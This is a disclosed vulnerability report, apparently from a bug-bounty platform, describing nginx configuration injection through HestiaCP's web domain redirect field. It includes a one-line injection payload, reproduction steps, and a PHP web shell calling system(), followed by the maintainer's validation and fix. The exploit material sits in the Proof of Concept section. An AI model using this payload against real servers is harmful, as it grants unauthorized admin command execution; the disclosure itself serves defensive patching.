Improper Input Validation Leads to Privilege Escalation and Denial of Service in hestiacp/hestiacp


Reported on

Jul 26th 2022


Improper input validation allows an attacker to privilege escalation and can make crash nginx server.

There is no input validation in the v-add-web-domain-redirect#L82, and "v-redirect-custom" input on the "Edit Web Domain" page, inputs are written directly to the /home/user/conf/web/ file. This file is included in /home/user/conf/web/ file.


location ~ /\.(?!well-known\/|file) {
       deny all;
       return 404;

    include /home/test/conf/web/*;

/home/user/conf/web/ file before payload (input is "asd")

if ($host != "asd") {
   return 301 $scheme://asd$request_uri;

/home/user/conf/web/ file after payload

if ($host != "redStar$request_uri; ## " ) {}   location /adminShell.php { alias /home/test/web/; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/;  } if ( $host = false ) { #") {
   return 301 $scheme://redStar$request_uri; ## " ) {}   location /adminShell.php { alias /home/test/web/; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/;  } if ( $host = false ) { #$request_uri;

Proof of Concept

Payload ( has to be one line! )

redStar$request_uri; ## " ) {}   location /adminShell.php { alias [FULLPATHINFO]; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/php8.0-fpm-[HOSTNAME].sock;  } if ( $host = false ) { #


[0] login as user

[1] Create a domain in dashbard

[2] go to Files in top bar

[3] go to "public_html" folder and create a php file contains like below, visit php file with browser, prepare your payload with fullpath and hostname information.



echo  getcwd();
echo "<br>";

[4] go to "Edit Web Domain" page in dashboard, select "Enable domain redirection" then select "Redirect visitors to a custom domain or web address", enter payload to text box and click save button.

[5] go to "public_html" folder, create a php file named adminShell.php



system("id; whoami;");

[6] Visit /adminShell.php with browser, commands running as "admin" user.

PoC Video


Attackers can perform an privilege escalation attack and a denial-of-service attack.

We are processing your report and will contact the hestiacp team within 24 hours. 17 days ago
We have contacted a member of the hestiacp team and are waiting to hear back 16 days ago
We have sent a follow up to the hestiacp team. We will try again in 7 days. 13 days ago
Jaap Marcus modified the Severity from Critical (9.9) to High (8.5) 9 days ago
Jaap Marcus assigned a CVE to this report 9 days ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Jaap Marcus validated this vulnerability 9 days ago
imp has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Jaap Marcus confirmed that a fix has been merged on b178b9 8 days ago
The fix bounty has been dropped
Jaap Marcus gave praise 8 days ago
Thank you for the report.
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
to join this conversation